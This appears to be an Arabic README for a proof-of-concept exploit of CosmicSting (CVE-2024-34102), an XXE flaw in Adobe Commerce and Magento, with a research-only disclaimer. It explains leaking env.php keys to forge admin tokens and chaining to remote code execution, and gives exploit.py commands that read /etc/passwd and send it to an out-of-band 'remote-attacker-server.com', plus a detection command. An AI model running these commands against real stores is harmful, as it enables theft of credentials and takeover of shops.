
CosmicSting: ثغرة أمنية حرجة من نوع XXE غير موثقة في Adobe Commerce و Magento (CVE-2024-34102)
CVE-2024-34102 هي ثغرة أمنية خطيرة ناتجة عن معالجة غير صحيحة لإلغاء التّسلسل المتداخل في Adobe Commerce وMagento. تسمح هذه الثغرة للمهاجمين باستغلال كيانات XML الخارجية (XXE) أثناء عملية إلغاء التّسلسل، مما قد يتيح تنفيذ التعليمات البرمجية عن بُعد. باختصار، يمكن للمهاجمين صياغة حمولات JSON ضارة عند إلغاء تسلسلها من قبل التطبيق، تؤدي إلى إنشاء كائنات بخصائص أو سلوكيات غير مقصودة. قد يؤدي هذا إلى مخاطر أمنية متنوعة.
يتيح استغلال هذه الثغرة للمهاجمين الحصول على وصول إداري غير مصرح به إلى REST API أو GraphQL API أو SOAP API، مما قد يؤدي إلى سرقة البيانات، وتعطيل الخدمة، والاختراق الكامل للأنظمة المتأثرة. تشكل هذه الثغرة خطراً كبيراً نظراً لقدرتها على تسريب ملفات حساسة، مثل app/etc/env.php، الذي يحتوي على مفاتيح تشفير تُستخدم للمصادقة. يمكن للمهاجمين استغلال ذلك لتزوير رموز المسؤولين والتلاعب بواجهات Magento’s APIs كمستخدمين متميزين.
علاوة على ذلك، يمكن ربط CVE-2024-34102 بثغرات أخرى، مثل استغلال سلاسل مرشحات PHP (CVE-2024-2961)، مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE). الآثار الأوسع لثغرات كيان XML الخارجي (XXE) تمكن المهاجمين من استرداد البيانات والتلاعب بها من مصادر خارجية، مما يزيد من الأثر المحتمل على الأنظمة المخترقة.
usage: exploit.py [-h] --target TARGET --read-file READ_FILE [--oob-server OOB_SERVER] [--host-server HOST_SERVER]
Exploit script for XXE vulnerability
options:
-h, --help show this help message and exit
--target TARGET, -t TARGET
Target URL (http(s)://ip[:port])
--read-file READ_FILE, -r READ_FILE
File to read from the remote host
--oob-server OOB_SERVER, -ob OOB_SERVER
OOB server URL (http(s)://ip[:port])
--host-server HOST_SERVER, -hs HOST_SERVER
Host server URL (http(s)://ip[:port])
أمثلة
# Run with local attacker server and local OOB server
python3 exploit.py -t https://magento.test -r "/etc/passwd"
# Run with remote attacker server and remote OOB server
python3 exploit.py -t https://magento.test --oob-server http://xxx.oasitfy.com --host-server https://remote-attacker-server.com -r "/etc/passwd"
# Detection
python3 detect.py -t https://magento.test
تم إنشاء هذا النص البرمجي للاستغلال لأغراض البحث وتطوير تقنيات دفاعية فعالة فقط. ليس المقصود منه استخدامه في أي أنشطة ضارة أو غير مصرح بها. يتنصل المؤلف ومالك النص البرمجي من أي مسؤولية أو التزام عن أي إساءة استخدام أو ضرر يسببه هذا البرنامج. يُطلب من المستخدمين استخدام هذا البرنامج بمسؤولية وفقط وفقًا للقوانين واللوائح المعمول بها. استخدمه بمسؤولية.